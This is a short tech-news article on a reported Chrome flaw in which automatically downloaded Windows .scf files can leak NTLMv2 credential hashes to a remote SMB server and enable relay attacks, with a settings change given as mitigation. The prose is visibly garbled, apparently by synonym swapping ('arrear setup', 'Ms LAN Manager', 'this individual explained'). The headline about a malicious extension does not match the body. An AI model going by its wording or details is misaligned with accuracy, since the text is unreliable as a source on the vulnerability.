Google is reportedly looking into the vulnerability.
Malicious Google Chrome extension collected user’s data for third parties
By Prempal Singh
A bug in Google’s popular web browser Chrome could permit bad actors to place a malicious record onto a target computer system that could then be used to siphon off Windows identity and start a Server Message Block (SMB) relay attack, relating to a post by Bosko Stankovic, an information security engineer at DefenseCode.
Stankovic uncovered the susceptibility in the default setup of Chrome and all Windows versions supporting the browser.
“With its arrear setup, Chrome browser will automatically download files that it considered safe without prompting the user for a download location but instead using the pre-specified one, ” Stankovic composed. This step, he described, is not optimal from securities standpoint, but for it to cause any harm a user would still need to physically open and run the file.
The issue is that a Windows Explorer Shell Command word File or SCF (. scf) – a textual content file that launches orders – requires no consumer action and can be used to trick windows into an authentication try out to a web-based SMB server, which then collects sufferer’ usernames and Ms LAN Manager (NTLMv2) security password hash, Stankovic wrote.
This can be enough personal data, this individual explained, to launch accounts breaches on Windows systems. For organization using Microsoft-exchange and which use NTLM as an authentication strategy, the bug could permit SMB relay attacks, where the bad actors could pose as the sufferer and so obtain networks without a security password.
Every time a number of anti-virus solutions were tested, none captured the downloaded file as dubious.
To disable computerized downloads available in Google Chrome, Stankovic recommended the following choices be checked: Settings -> Show advanced configurations -> Check the Ask where to save each file before getting an option.
“Manually approving each download attempt significantly reduces the risk of NTLMv2 credential theft attacks using SCF files, ” this individual explained.